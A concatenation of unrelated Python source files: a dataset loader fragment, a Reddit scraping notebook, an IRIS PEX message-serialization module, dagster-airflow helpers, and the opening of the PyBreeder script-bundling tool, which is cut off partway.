        answers = sample_info.get('answers', [])
        answer_processor_arg = {'answers': answers}
        # The answer processor consumes the OCR tokens (for copy mechanisms).
        answer_processor_arg['tokens'] = sample.pop('ocr_tokens', [])
        processed_answers = self.answer_processor(answer_processor_arg)
        sample.update(processed_answers)
        sample.answers = object_to_byte_tensor(answers)
        if 'answers_scores' in sample:
            sample.targets = sample.pop('answers_scores')
        return sample
    def get_phoc_feature(self, file_name):
        """Load precomputed PHOC features for one question from JSON."""
        with open(os.path.join(self.phoc_feature_path, file_name), 'r') as f:
            phoc = json.load(f)
        context_phoc = phoc['context_phoc']
        return context_phoc
|
<gh_stars>0
# coding: utf-8
# # Reddit Part One: Getting Data
#
# You're going to scrape the front page of https://www.reddit.com! Reddit is a magic land made of many many semi-independent kingdoms, called subreddits. We need to find out which are the most powerful.
#
# You are going to scrape the front page of reddit every 4 hours, saving a CSV file that includes:
# * The title of the post
# * The number of votes it has (the number between the up and down arrows)
# * The number of comments it has
# * What subreddit it is from (e.g. /r/AskReddit, /r/todayilearned)
# * When it was posted (get a TIMESTAMP, e.g. 2016-06-22T12:33:58+00:00, not "4 hours ago")
# * The URL to the post itself
# * The URL of the thumbnail image associated with the post
#
# Note:
#
# <p>Ugh, reddit is horrible when it hasn't been customized to your tastes. If you would like something more exciting/less idiotic, try scraping a multireddit page - https://www.reddit.com/r/multihub/top/?sort=top&t=year - they're subreddits clustered by topics.
#
# <p>For example, you could scrape https://www.reddit.com/user/CrownReserve/m/improveyoself which is all self-improvement subreddits. You can follow the links at https://www.reddit.com/r/multihub/top/?sort=top&t=year or use the "Find Multireddits" link on the Multireddit page to find more.
# In[83]:
from bs4 import BeautifulSoup
import requests
# Fetch the reddit front page with a browser-like UA and parse it once;
# all extractor functions below operate on this parsed document.
user_agent = {'User-agent': 'Mozilla/5.0'}
html_str = requests.get('https://www.reddit.com/', headers = user_agent).text
# In[85]:
document = BeautifulSoup(html_str, 'html.parser')
# In[86]:
# The title of the post
# The whole post is under `<div>` class = ' thing id-t3_4 ....'
# <div> class = 'entry unvoted'
# <p> class = 'title'
# `<a>` class = 'title may-blank '
# The number of votes it has (the number between the up and down arrows)
# The number of votes is in <div> class = 'score unvoted'
# sometimes this is •
# The number of comments it has
# There's a
# <div> class = 'entry unvoted'
# <ul> class = 'flat-list buttons'
# <li> class = 'first'
# <a> class = 'bylink comments may-blank'
# What subreddit it is from (e.g. /r/AskReddit, /r/todayilearned)
# <div> class = 'entry unvoted'
# <p> class='tagline'
# <a> class = 'subreddit hover may-blank'
# When it was posted (get a TIMESTAMP, e.g. 2016-06-22T12:33:58+00:00, not "4 hours ago")
# <div> class = 'entry unvoted'
# <p> class='tagline'
# <time> it's actually in the tag
# The URL to the post itself
# This is in two places. Both inside the main <div> tag and in the same tag with the title.
# The URL of the thumbnail image associated with the post
# There are two thumbnail urls—the one I guess it's from originally and the reddit thumbnail. Here's how to get the reddit thumbnail:
# <a> class = 'thumbnail may-blank'
# <img> it's actually in the tag
# What I eventually want:
# posts_today = [
# {'title': '"Two clowns in the same circus" 16 x 12s oil on linen'},
# {'votes': 4246},
# {'comments': 372},
# {'subreddit': '/r/Art'},
# {'timestamp': '2016-06-22T12:33:58+00:00'},
# {'url': 'https://www.reddit.com/r/Art/comments/4pbvk5/two_clowns_in_the_same_circus_16_x_12s_oil_on/'},
# {'thumb_url': 'https://b.thumbs.redditmedia.com/p32PnbLD9t9hqvw9Q5X7eZS2tI7Ygqnh5K5MTxOERSE.jpg'}
# ]
# In[148]:
import re
# In[272]:
# The organic (non-ad) listing lives in div#siteTable; each post follows a
# 'clearleft' spacer div.
non_ads = document.find('div', {'id': 'siteTable'})
one_sibling_up = non_ads.find_all('div', {'class': 'clearleft'})
# In[89]:
# troubleshooting
# document
# In[273]:
# because only every other clearleft has a post in it:
posts = [tag.find_next_sibling('div') for tag in one_sibling_up if tag.find_next_sibling('div')]
# In[97]:
def title(post):
    """Return the post's title text, or 'NO TITLE' when the tag is absent."""
    tag = post.find('a', {'class': 'title may-blank '})
    return tag.string if tag else 'NO TITLE'
# In[164]:
def votes(post):
    """Return the post's score as an int, or 'NO INFO' when unavailable.

    FIX: reddit sometimes renders the score as a bullet ('•') when it is
    hidden (noted in the selector comments above); int() on that raised
    ValueError. Non-numeric or empty scores now also map to 'NO INFO'.
    """
    tag = post.find('div', {'class': 'score unvoted'})
    if not tag:
        return 'NO INFO'
    try:
        return int(tag.string)
    except (TypeError, ValueError):
        # hidden score ('•') or a tag with no string content
        return 'NO INFO'
# In[156]:
def comments(post):
    """Return the post's comment count, defaulting to 0 when absent."""
    link = post.find('a', {'class': 'bylink comments may-blank'})
    if not link:
        return 0
    # Link text reads '372 comments' or '1 comment'; strip the suffix.
    count_text = link.text.replace(' comments', '').replace(' comment', '')
    return int(count_text)
# In[162]:
def subreddit(post):
    """Return the subreddit label (e.g. '/r/Art'), or 'NO SUBREDDIT'."""
    link = post.find('a', {'class': 'subreddit hover may-blank'})
    return link.text if link else 'NO SUBREDDIT'
# In[262]:
# Doing timestamp with regular expressions
# # When it was posted (get a TIMESTAMP, e.g. 2016-06-22T12:33:58+00:00, not "4 hours ago")
# # <div> class = 'entry unvoted'
# # <p> class='tagline'
# # <time> it's actually in the tag
# # Regular Expressions only works on strings, not Beautiful Soup objects.
# # Even document is a Beautiful Soup object, so you need to go back to html_str
# timestamps = re.findall(r'datetime="(\S+)"', html_str)
# timestamps
# # Since I want to cut out the first 9 results. First one: 2016-06-22T19:52:01+00:00
# list_number = 8
# for post in posts:
# list_number += 1
# print(timestamps[list_number])
# In[265]:
def timestamp(post):
    """Return the ISO datetime string from the post's <time> tag."""
    tag = post.find('time')
    return tag.get('datetime') if tag else 'NO TIMESTAMP'
# In[252]:
# Doing url with regular expressions
# # The URL to the post itself
# # This is in two places. Both inside the main <div> tag and in the same tag with the title.
# urls = re.findall(r'<a class="title may-blank " href="(\S+)"', html_str)
# urls
# In[260]:
def url(post):
    """Return the absolute URL a post links to.

    Reddit-internal links are stored as site-relative paths ('/r/...'), so
    those are prefixed with the reddit origin; external links are returned
    unchanged.  Returns 'NO URL' when the post has no 'data-url' attribute.
    """
    link = post.get('data-url')
    if not link:
        return 'NO URL'
    if link[:2] == '/r':
        # BUG FIX: the path already starts with '/', so join without an extra
        # slash (previously produced 'https://www.reddit.com//r/...').
        return 'https://www.reddit.com' + link
    return link
# In[251]:
# My unfinished, really messy attempt at trying to do thumb_url with regular expressions:
# #<img src="//\w.thumbs.redditmedia.com/[\w-]+.jpg"
# thumb_urls = re.findall(r'<a class=("thumbnail s*e*l*f* *may-blank a*f*f*i*l*i*a*t*e* *") href="([/:\w\._]+)" rel="\w*" ><img src=("//\w.thumbs.redditmedia.com/[\w-]+.jpg")', html_str)
# print(len(thumb_urls))
# thumb_urls
# In[248]:
def thumb_url(post):
    """Return the thumbnail image src, or 'NO THUMBNAIL' when absent."""
    image = post.find('img')
    return image.get('src') if image else 'NO THUMBNAIL'
# In[275]:
# Build one record per scraped post.
posts_today = []
for post in posts:
    posts_today.append({
        'title': title(post),
        'votes': votes(post),
        'comments': comments(post),
        'subreddit': subreddit(post),
        'timestamp': timestamp(post),
        'url': url(post),
        'thumb_url': thumb_url(post),
    })
# Kept so later notebook cells that reference post_dict still see an empty dict.
post_dict = {}
print(len(posts_today))
posts_today
# In[268]:
import pandas as pd
# In[276]:
# One row per post; this is what gets written out (and mailed) later.
posts_today_csv = pd.DataFrame(posts_today)
posts_today_csv
# # Reddit Part Two: Sending data
#
# You'd like to get something in your inbox about what's happening on reddit every morning at 8:30AM. Using a mailgun.com account and their API, send an email to your email address with the CSV you saved at 8AM attached. The title of the email should be something like "Reddit this morning: January, 1 1970"
#
# <p>TIP: How are you going to find that csv file? Well, think about how specific the datetime stamp in the filename really needs to be.
# In[270]:
import time
# Day-granular stamp so the 8:30AM mailer can reconstruct today's filename.
datestring = time.strftime('%Y-%m-%d')
filename = 'reddit-data-' + datestring + '.csv'
posts_today_csv.to_csv(filename, index=False)
|
<filename>src/python/grongier/pex/_business_host.py<gh_stars>0
import datetime
import pickle
import codecs
import uuid
import decimal
import base64
import json
import importlib
import iris
from inspect import signature
from grongier.dacite import from_dict
from grongier.pex._common import _Common
class _BusinessHost(_Common):
    """ This is a superclass for BusinessService, BusinesProcess, and BusinessOperation that
    defines common methods. It is a subclass of Common.
    """

    # Chunk size (in characters) used when writing serialized payloads into an
    # IRIS %Stream.GlobalCharacter stream.
    buffer:int = 64000

    def input_serialzer(fonction):
        """Decorator: serialize each positional argument (python message ->
        IRIS message object) before invoking the wrapped method.
        NOTE(review): "serialzer" is misspelled but is part of the public
        decorator API, so the name is kept."""
        def dispatch_serializer(self, *params, **param2):
            serialized = []
            for param in params:
                serialized.append(self._dispatch_serializer(param))
            return fonction(self, *serialized, **param2)
        return dispatch_serializer

    def output_deserialzer(fonction):
        """Decorator: deserialize the wrapped method's return value
        (IRIS message object -> python message)."""
        def dispatch_deserializer(self, *params, **param2):
            return self._dispatch_deserializer(fonction(self, *params, **param2))
        return dispatch_deserializer

    def input_deserialzer(fonction):
        """Decorator: deserialize each positional argument before invoking
        the wrapped method."""
        def dispatch_deserializer(self, *params, **param2):
            serialized = []
            for param in params:
                serialized.append(self._dispatch_deserializer(param))
            return fonction(self, *serialized, **param2)
        return dispatch_deserializer

    def output_serialzer(fonction):
        """Decorator: serialize the wrapped method's return value."""
        def dispatch_serializer(self, *params, **param2):
            return self._dispatch_serializer(fonction(self, *params, **param2))
        return dispatch_serializer

    @input_serialzer
    @output_deserialzer
    def send_request_sync(self, target, request, timeout=-1, description=None):
        """ Send the specified message to the target business process or business operation synchronously.
        Parameters:
            target: a string that specifies the name of the business process or operation to receive the request.
                The target is the name of the component as specified in the Item Name property in the production definition, not the class name of the component.
            request: specifies the message to send to the target. The request is either an instance of a class that is a subclass of Message class or of IRISObject class.
                If the target is a build-in ObjectScript component, you should use the IRISObject class. The IRISObject class enables the PEX framework to convert the message to a class supported by the target.
            timeout: an optional integer that specifies the number of seconds to wait before treating the send request as a failure. The default value is -1, which means wait forever.
            description: an optional string parameter that sets a description property in the message header. The default is None.
        Returns:
            the response object from target.
        Raises:
            TypeError: if request is not of type Message or IRISObject.
        """
        return self.iris_handle.dispatchSendRequestSync(target, request, timeout, description)

    @input_serialzer
    def send_request_async(self, target, request, description=None):
        """ Send the specified message to the target business process or business operation asynchronously.
        Parameters:
            target: a string that specifies the name of the business process or operation to receive the request.
                The target is the name of the component as specified in the Item Name property in the production definition, not the class name of the component.
            request: specifies the message to send to the target. The request is an instance of IRISObject or of a subclass of Message.
                If the target is a built-in ObjectScript component, you should use the IRISObject class. The IRISObject class enables the PEX framework to convert the message to a class supported by the target.
            description: an optional string parameter that sets a description property in the message header. The default is None.
        Raises:
            TypeError: if request is not of type Message or IRISObject.
        """
        return self.iris_handle.dispatchSendRequestAsync(target, request, description)

    def _serialize_pickle_message(self, message):
        """ Converts a python message into an iris Grongier.PEX.PickleMessage
        by pickling it and base64-encoding the pickle.
        Parameters:
            message: The message to serialize.
        Returns:
            The IRIS Grongier.PEX.PickleMessage object wrapping the payload.
        """
        pickle_string = codecs.encode(pickle.dumps(message), "base64").decode()
        module = message.__class__.__module__
        classname = message.__class__.__name__
        msg = iris.cls('Grongier.PEX.PickleMessage')._New()
        msg.classname = module + "." + classname
        stream = iris.cls('%Stream.GlobalCharacter')._New()
        n = self.buffer
        # Write in buffer-sized chunks; a single huge Write is avoided.
        chunks = [pickle_string[i:i+n] for i in range(0, len(pickle_string), n)]
        for chunk in chunks:
            stream.Write(chunk)
        msg.jstr = stream
        return msg

    def _dispatch_serializer(self, message):
        """Route a message to the JSON or pickle serializer depending on its
        declared kind; pass anything else (e.g. IRISObject) through untouched."""
        if (message is not None and self._is_message_instance(message)):
            return self._serialize_message(message)
        elif (message is not None and self._is_pickle_message_instance(message)):
            return self._serialize_pickle_message(message)
        else:
            return message

    def _serialize_message(self, message):
        """ Converts a python dataclass message into an iris grongier.pex.message.
        Parameters:
            message: The message to serialize, an instance of a class that is a subclass of Message.
        Returns:
            The IRIS Grongier.PEX.Message object wrapping the json payload.
        """
        json_string = json.dumps(message, cls=IrisJSONEncoder)
        module = message.__class__.__module__
        classname = message.__class__.__name__
        msg = iris.cls('Grongier.PEX.Message')._New()
        msg.classname = module + "." + classname
        stream = iris.cls('%Stream.GlobalCharacter')._New()
        n = self.buffer
        # Write in buffer-sized chunks; a single huge Write is avoided.
        chunks = [json_string[i:i+n] for i in range(0, len(json_string), n)]
        for chunk in chunks:
            stream.Write(chunk)
        msg.jstr = stream
        return msg

    def _serialize(self, message):
        """ Converts a message into json format.
        Parameters:
            message: The message to serialize, an instance of a class that is a subclass of Message.
        Returns:
            string: "<module>.<classname>:<json>" or None for a None message.
        """
        if (message is not None):
            json_string = json.dumps(message, cls=IrisJSONEncoder)
            module = message.__class__.__module__
            classname = message.__class__.__name__
            return module + "." + classname + ":" + json_string
        else:
            return None

    def _deserialize_pickle_message(self, serial):
        """
        Converts an iris Grongier.PEX.PickleMessage back into a python message
        by reading the stream in chunks and unpickling the base64 payload.
        """
        string = ""
        serial.jstr.Rewind()
        while not serial.jstr.AtEnd:
            string += serial.jstr.Read(self.buffer)
        msg = pickle.loads(codecs.decode(string.encode(), "base64"))
        return msg

    def _dispatch_deserializer(self, serial):
        """Route an IRIS object to the matching deserializer based on its IRIS
        class; non-IRIS values are returned unchanged."""
        if (serial is not None and type(serial).__module__.find('iris') == 0) and serial._IsA("Grongier.PEX.Message"):
            return self._deserialize_message(serial)
        elif (serial is not None and type(serial).__module__.find('iris') == 0) and serial._IsA("Grongier.PEX.PickleMessage"):
            return self._deserialize_pickle_message(serial)
        else:
            return serial

    def _deserialize_message(self, serial):
        """
        Converts an iris grongier.pex.message into an python dataclass message.
        Raises ValueError for a missing/module-less classname and ImportError
        when the target class cannot be imported.
        """
        if (serial.classname is None):
            raise ValueError("JSON message malformed, must include classname")
        classname = serial.classname
        j = classname.rindex(".")
        if (j <= 0):
            raise ValueError("Classname must include a module: " + classname)
        try:
            module = importlib.import_module(classname[:j])
            msg = getattr(module, classname[j+1:])
        except Exception:
            raise ImportError("Class not found: " + classname)
        string = ""
        serial.jstr.Rewind()
        while not serial.jstr.AtEnd:
            string += serial.jstr.Read(self.buffer)
        jdict = json.loads(string, cls=IrisJSONDecoder)
        msg = self._dataclass_from_dict(msg, jdict)
        return msg

    def _deserialize(self, serial):
        """ Converts a json string into a message of type classname, which is stored in the json string.
        Parameters:
            serial: The json string to deserialize ("<module>.<class>:<json>").
        Returns:
            Message: The message as an instance of the class specified in the json string, which is a subclass of Message.
        Raises:
            ImportError: if the classname does not include a module name to import.
        """
        if (serial is not None and serial != ""):
            i = serial.find(":")
            if (i <= 0):
                raise ValueError("JSON message malformed, must include classname: " + serial)
            classname = serial[:i]
            j = classname.rindex(".")
            if (j <= 0):
                raise ValueError("Classname must include a module: " + classname)
            try:
                module = importlib.import_module(classname[:j])
                msg = getattr(module, classname[j+1:])
            except Exception:
                raise ImportError("Class not found: " + classname)
            jdict = json.loads(serial[i+1:], cls=IrisJSONDecoder)
            msg = self._dataclass_from_dict(msg, jdict)
            return msg
        else:
            return None

    def _dataclass_from_dict(self, klass, dikt):
        """Instantiate dataclass *klass* from *dikt*; any keys not declared as
        fields are attached afterwards as plain attributes."""
        ret = from_dict(klass, dikt)
        try:
            fieldtypes = klass.__annotations__
        except Exception as e:
            fieldtypes = []
        for key, val in dikt.items():
            if key not in fieldtypes:
                setattr(ret, key, val)
        return ret

    def _dispach_message(self, request):
        """
        It takes a request object, and returns a response object.
        The handler is looked up in self.DISPATCH by the request's fully
        qualified class name, falling back to the generic 'on_message'.
        NOTE(review): "dispach" is misspelled but callers use this name.
        :param request: The request object
        :return: The return value is the result of the method call.
        """
        call = 'on_message'
        module = request.__class__.__module__
        classname = request.__class__.__name__
        for msg, method in self.DISPATCH:
            if msg == module + "." + classname:
                call = method
        return getattr(self, call)(request)

    def _create_dispatch(self):
        """
        It creates a list of tuples, where each tuple contains the name of a class and the name of a method
        that takes an instance of that class as its only argument
        :return: A list of tuples.
        """
        if len(self.DISPATCH) == 0:
            # get all function in current BO
            method_list = [func for func in dir(self) if callable(getattr(self, func)) and not func.startswith("_")]
            for method in method_list:
                # get signature of current function
                try:
                    param = signature(getattr(self, method)).parameters
                # Handle staticmethod
                except ValueError as e:
                    param = ''
                # one parameter
                if (len(param) == 1):
                    # get parameter type
                    annotation = str(param[list(param)[0]].annotation)
                    # trim annotation format <class 'toto'>
                    i = annotation.find("'")
                    j = annotation.rfind("'")
                    # if end is not found
                    if j == -1:
                        j = None
                    classname = annotation[i+1:j]
                    self.DISPATCH.append((classname, method))
        return

    @staticmethod
    def OnGetConnections():
        """ The OnGetConnections() method returns all of the targets of any SendRequestSync or SendRequestAsync
        calls for the class. Implement this method to allow connections between components to show up in
        the interoperability UI.
        Returns:
            An IRISList containing all targets for this class. Default is None.
        """
        return None

    def SendRequestSync(self, target, request, timeout=-1, description=None):
        """ DEPRECATED : use send_request_sync
        `SendRequestSync` is a function that sends a request to a target and waits for a response
        :param target: The target of the request
        :param request: The request to send
        :param timeout: The timeout in seconds. If the timeout is negative, the default timeout will be used
        :param description: A string that describes the request. This is used for logging purposes
        :return: The return value is a tuple of (response, status).
        """
        return self.send_request_sync(target, request, timeout, description)

    def SendRequestAsync(self, target, request, description=None):
        """ DEPRECATED : use send_request_async
        It takes a target, a request, and a description, and returns a send_request_async function
        :param target: The target of the request. This is the name of the function you want to call
        :param request: The request to send
        :param description: A string that describes the request
        :return: The return value is a Future object.
        """
        return self.send_request_async(target, request, description)

    @staticmethod
    def getAdapterType():
        """ DEPRECATED : use get_adapter_type
        Name of the registred Adapter
        """
        return

    @staticmethod
    def get_adapter_type():
        """
        Name of the registred Adapter
        """
        return
# Tags non-JSON-native values (DataFrames, date/times, decimals, UUIDs, bytes)
# with a "type:" prefix so IrisJSONDecoder can restore them later.
class IrisJSONEncoder(json.JSONEncoder):
    """
    JSONEncoder subclass that knows how to encode date/time, decimal types, and
    UUIDs.
    """

    def default(self, o):
        # Plain objects (dataclass instances) become their attribute dict.
        # This check must stay first in the chain.
        if hasattr(o, '__dict__'):
            return o.__dict__
        if o.__class__.__name__ == 'DataFrame':
            return 'dataframe:' + o.to_json()
        # datetime before date: datetime instances also pass isinstance(date).
        if isinstance(o, datetime.datetime):
            text = o.isoformat()
            if o.microsecond:
                # keep milliseconds only
                text = text[:23] + text[26:]
            if text.endswith("+00:00"):
                text = text[:-6] + "Z"
            return 'datetime:' + text
        if isinstance(o, datetime.date):
            return 'date:' + o.isoformat()
        if isinstance(o, datetime.time):
            text = o.isoformat()
            if o.microsecond:
                # keep milliseconds only
                text = text[:12]
            return 'time:' + text
        if isinstance(o, decimal.Decimal):
            return 'decimal:' + str(o)
        if isinstance(o, uuid.UUID):
            return 'uuid:' + str(o)
        if isinstance(o, bytes):
            return 'bytes:' + base64.b64encode(o).decode("UTF-8")
        return super().default(o)
# Counterpart to IrisJSONEncoder: string values of the form "<type>:<payload>"
# are converted back to the matching Python type; everything else passes through.
class IrisJSONDecoder(json.JSONDecoder):
    """
    JSONDecoder subclass that restores values tagged by IrisJSONEncoder
    ("datetime:", "date:", "time:", "dataframe:", "decimal:", "uuid:",
    "bytes:") to their original Python types.
    """

    def __init__(self, *args, **kwargs):
        json.JSONDecoder.__init__(
            self, object_hook=self.object_hook, *args, **kwargs)

    def object_hook(self, obj):
        """Rebuild typed values from their "type:payload" string encoding."""
        ret = {}
        for key, value in obj.items():
            i = 0
            if isinstance(value, str):
                i = value.find(":")
            if (i > 0):
                typ = value[:i]
                payload = value[i+1:]
                if typ == 'datetime':
                    # BUG FIX: the encoder writes UTC offsets as a trailing
                    # "Z", which fromisoformat() only accepts on Python >= 3.11;
                    # normalize it before parsing.
                    ret[key] = datetime.datetime.fromisoformat(payload.replace("Z", "+00:00"))
                elif typ == 'date':
                    # BUG FIX: was datetime.datetime.fromisoformat, which
                    # returned a datetime instead of the original date.
                    ret[key] = datetime.date.fromisoformat(payload)
                elif typ == 'time':
                    # BUG FIX: was datetime.datetime.fromisoformat, which
                    # raises ValueError on a bare time string.
                    ret[key] = datetime.time.fromisoformat(payload)
                elif typ == 'dataframe':
                    module = importlib.import_module('pandas')
                    pd = getattr(module, 'DataFrame')
                    ret[key] = pd(payload)
                elif typ == 'decimal':
                    ret[key] = decimal.Decimal(payload)
                elif typ == 'uuid':
                    ret[key] = uuid.UUID(payload)
                elif typ == 'bytes':
                    ret[key] = base64.b64decode((payload.encode("UTF-8")))
                else:
                    # Unknown prefix (e.g. a URL) — keep the raw string.
                    ret[key] = value
            else:
                ret[key] = value
        return ret
|
<gh_stars>0
import os
import dateutil.parser
from airflow.exceptions import AirflowException, AirflowSkipException
from dagster import DagsterEventType, check
from dagster.core.events import DagsterEvent
from dagster.core.execution.api import create_execution_plan, execute_plan
from dagster.core.execution.plan.plan import can_isolate_steps, should_skip_step
from dagster.core.instance import AIRFLOW_EXECUTION_DATE_STR, DagsterInstance
def check_events_for_failures(events):
    """Raise AirflowException for the first STEP_FAILURE event, if any."""
    check.list_param(events, "events", of_type=DagsterEvent)
    failure = next(
        (e for e in events if e.event_type_value == "STEP_FAILURE"), None
    )
    if failure is not None:
        raise AirflowException(
            "step failed with error: %s" % failure.event_specific_data.error.to_string()
        )
# Using AirflowSkipException is a canonical way for tasks to skip themselves; see example
# here: http://bit.ly/2YtigEm
def check_events_for_skips(events):
    """Raise AirflowSkipException when any event is a STEP_SKIPPED."""
    check.list_param(events, "events", of_type=DagsterEvent)
    skip_value = DagsterEventType.STEP_SKIPPED.value
    if any(e.event_type_value == skip_value for e in events):
        raise AirflowSkipException("Dagster emitted skip event, skipping execution in Airflow")
def convert_airflow_datestr_to_epoch_ts(airflow_ts):
    """convert_airflow_datestr_to_epoch_ts
    Converts Airflow time strings (e.g. 2019-06-26T17:19:09+00:00) to epoch timestamps.
    """
    epoch = dateutil.parser.parse("1970-01-01T00:00:00+00:00")
    delta = dateutil.parser.parse(airflow_ts) - epoch
    return delta.total_seconds()
def get_aws_environment():
    """
    Return AWS environment variables for Docker and Kubernetes execution.
    """
    # Forward the credential pair only when *both* halves are present: blank or
    # partial values break boto's credential-resolution chain (see
    # https://github.com/boto/botocore/pull/1687).  Note that if these env vars
    # are set in Kubernetes, anyone with access to pods in that namespace can
    # retrieve them; this may not be appropriate for all environments.
    key_id = os.getenv("AWS_ACCESS_KEY_ID")
    secret = os.getenv("AWS_SECRET_ACCESS_KEY")
    if key_id and secret:
        # TODO: also get region env var this way, since boto commands may fail without it
        return {"AWS_ACCESS_KEY_ID": key_id, "AWS_SECRET_ACCESS_KEY": secret}
    if key_id or secret:
        raise ValueError(
            "If `propagate_aws_vars=True`, must provide either both of AWS_ACCESS_KEY_ID "
            "and AWS_SECRET_ACCESS_KEY env vars, or neither."
        )
    return {}
def check_storage_specified(pipeline_def, mode_def):
    """Fail fast unless step outputs are persisted where other processes can read them."""
    if can_isolate_steps(pipeline_def, mode_def):
        return
    raise AirflowException(
        "DAGs created using dagster-airflow run each step in its own process, but your "
        "pipeline includes solid outputs that will not be stored somewhere where other "
        "processes can retrieve them. Please use a persistent IO manager for these "
        "outputs. E.g. with\n"
        '    @pipeline(mode_defs=[ModeDefinition(resource_defs={"io_manager": fs_io_manager})])'
    )
def invoke_steps_within_python_operator(
    invocation_args, ts, dag_run, **kwargs
):  # pylint: disable=unused-argument
    """Execute a set of Dagster steps inside an Airflow PythonOperator.

    Registers a managed run keyed on the Airflow dag_run's run_id, builds the
    execution plan for the requested step keys, executes it, and converts
    Dagster step failures/skips into their Airflow exception equivalents.
    Returns the list of DagsterEvents produced; returns None implicitly when
    no instance_ref is supplied.
    """
    mode = invocation_args.mode
    pipeline_name = invocation_args.pipeline_name
    step_keys = invocation_args.step_keys
    instance_ref = invocation_args.instance_ref
    run_config = invocation_args.run_config
    recon_repo = invocation_args.recon_repo
    pipeline_snapshot = invocation_args.pipeline_snapshot
    execution_plan_snapshot = invocation_args.execution_plan_snapshot
    parent_pipeline_snapshot = invocation_args.parent_pipeline_snapshot
    # Reuse Airflow's run id so retries of the same dag_run attach to the
    # same Dagster run.
    run_id = dag_run.run_id
    instance = DagsterInstance.from_ref(instance_ref) if instance_ref else None
    if instance:
        with instance:
            # Tag the run with the Airflow execution date so it can be traced
            # back from the Dagster side.
            tags = {AIRFLOW_EXECUTION_DATE_STR: ts} if ts else {}
            pipeline_run = instance.register_managed_run(
                pipeline_name=pipeline_name,
                run_id=run_id,
                run_config=run_config,
                mode=mode,
                solids_to_execute=None,
                step_keys_to_execute=None,
                tags=tags,
                root_run_id=None,
                parent_run_id=None,
                pipeline_snapshot=pipeline_snapshot,
                execution_plan_snapshot=execution_plan_snapshot,
                parent_pipeline_snapshot=parent_pipeline_snapshot,
            )
            recon_pipeline = recon_repo.get_reconstructable_pipeline(
                pipeline_name
            ).subset_for_execution_from_existing_pipeline(pipeline_run.solids_to_execute)
            execution_plan = create_execution_plan(
                recon_pipeline,
                run_config=run_config,
                step_keys_to_execute=step_keys,
                mode=mode,
            )
            # Propagate a Dagster-side skip decision as an Airflow skip.
            if should_skip_step(execution_plan, instance, pipeline_run.run_id):
                raise AirflowSkipException(
                    "Dagster emitted skip event, skipping execution in Airflow"
                )
            events = execute_plan(
                execution_plan, recon_pipeline, instance, pipeline_run, run_config=run_config
            )
            check_events_for_failures(events)
            check_events_for_skips(events)
            return events
def airflow_tags_for_ts(ts):
    """Converts an Airflow timestamp string to a list of tags."""
    check.opt_str_param(ts, "ts")
    tag = {"key": AIRFLOW_EXECUTION_DATE_STR, "value": ts}
    return [tag]
|
#!/usr/bin/python
#
# This is a poor-man's executable builder, for embedding dependencies into
# our pagekite.py file until we have proper packaging.
#
import base64, os, sys, zlib
BREEDER_NOTE = """\
#
# WARNING: This is a compilation of multiple Python files. Do not edit.
#
"""
BREEDER_PREAMBLE = """\
#!/usr/bin/python
#
%s
#
##[ Combined with Breeder: http://pagekite.net/wiki/Floss/PyBreeder/ ]#########
import base64, imp, os, sys, StringIO, zlib
__FILES = {}
__os_path_exists = os.path.exists
__os_path_getsize = os.path.getsize
__builtin_open = open
def __comb_open(filename, *args, **kwargs):
if filename in __FILES:
return StringIO.StringIO(__FILES[filename])
else:
return __builtin_open(filename, *args, **kwargs)
def __comb_exists(filename, *args, **kwargs):
if filename in __FILES:
return True
else:
return __os_path_exists(filename, *args, **kwargs)
def __comb_getsize(filename, *args, **kwargs):
if filename in __FILES:
return len(__FILES[filename])
else:
return __os_path_getsize(filename, *args, **kwargs)
if 'b64decode' in dir(base64):
__b64d = base64.b64decode
else:
__b64d = base64.decodestring
open = __comb_open
os.path.exists = __comb_exists
os.path.getsize = __comb_getsize
sys.path[0:0] = ['.SELF/']
"""
BREEDER_GTK_PREAMBLE = """\
try:
import gobject, gtk
def gtk_open_image(filename):
return __FILES[filename.replace('\\\\', '/')+':GTK']
except ImportError:
gtk_open_image = None
"""
BREEDER_POSTAMBLE = """\
#EOF#
"""
BREEDER_DIVIDER = '#' * 79
def br79(data):
    """Split *data* into lines of at most 79 characters."""
    return [data[start:start + 79] for start in range(0, len(data), 79)]
def format_snake(fn, raw=False, compress=False, binary=False):
    # Read file *fn* and return (prefix, payload_lines, suffix) ready to be
    # embedded as a Python expression in the combined script:
    #   raw      -> verbatim source lines (used for the __main__ script)
    #   compress -> zlib-compressed + base64, wrapped in a decompress call
    #   binary   -> base64 only
    #   default  -> escaped triple-quoted string literal
    # NOTE: Python 2 code — ''.join over an 'rb' handle relies on py2 str==bytes.
    fd = open(fn, 'rb')
    if raw:
        pre, post = '"""\\', '"""'
        lines = [l.replace('\n', '')
                  .replace('\r', '')
                 for l in fd.readlines()]
    elif compress:
        pre, post = 'zlib.decompress(__b64d("""\\', '"""))'
        lines = br79(base64.b64encode(zlib.compress(''.join(fd.readlines()), 9)))
    elif binary:
        pre, post = '__b64d("""\\', '""")'
        lines = br79(base64.b64encode(''.join(fd.readlines())))
    else:
        # Escape backslashes and quotes so the source survives as a literal.
        pre, post = '"""\\', '"""'
        lines = [l.replace('\n', '')
                  .replace('\r', '')
                  .replace('\\', '\\\\')
                  .replace('"', '\\"')
                 for l in fd.readlines()]
    fd.close()
    return pre, lines, post
def breed_python(fn, main, compress=False, gtk_images=False):
    # Embed a python file: register its source in __FILES and synthesize a
    # module object for it at load time.  The *main* file is emitted verbatim
    # so it becomes the combined script's entry point.
    pre, lines, post = format_snake(fn, raw=main, compress=compress)
    if main: return '\n'.join(lines)
    # Derive the dotted module name from the file's package position:
    # package/__init__.py -> "package"; then walk up while parent directories
    # contain an __init__.py.
    path = os.path.dirname(fn)
    if fn.endswith('/__init__.py'):
        bn = os.path.basename(path)
        path = path[:-(len(bn)+1)]
    else:
        bn = os.path.basename(fn).replace('.py', '')
    while path and os.path.exists(os.path.join(path, '__init__.py')):
        pbn = os.path.basename(path)
        bn = '%s.%s' % (pbn, bn)
        path = path[:-(len(pbn)+1)]
    text = ['__FILES[".SELF/%s"] = %s' % (fn, pre)]
    text.extend(lines)
    text.extend([
        post,
        'sys.modules["%s"] = imp.new_module("%s")' % (bn, bn),
        'sys.modules["%s"].open = __comb_open' % (bn, ),
    ])
    if gtk_images:
        text.append('sys.modules["%s"].gtk_open_image = gtk_open_image' % (bn, ))
    if '.' in bn:
        # Attach the submodule as an attribute of its parent package.
        parts = bn.split('.')
        text.append(('sys.modules["%s"].%s = sys.modules["%s"]'
                     ) % ('.'.join(parts[:-1]), parts[-1], bn))
    # Emitted code is Python 2 ("exec ... in ...").
    text.extend([
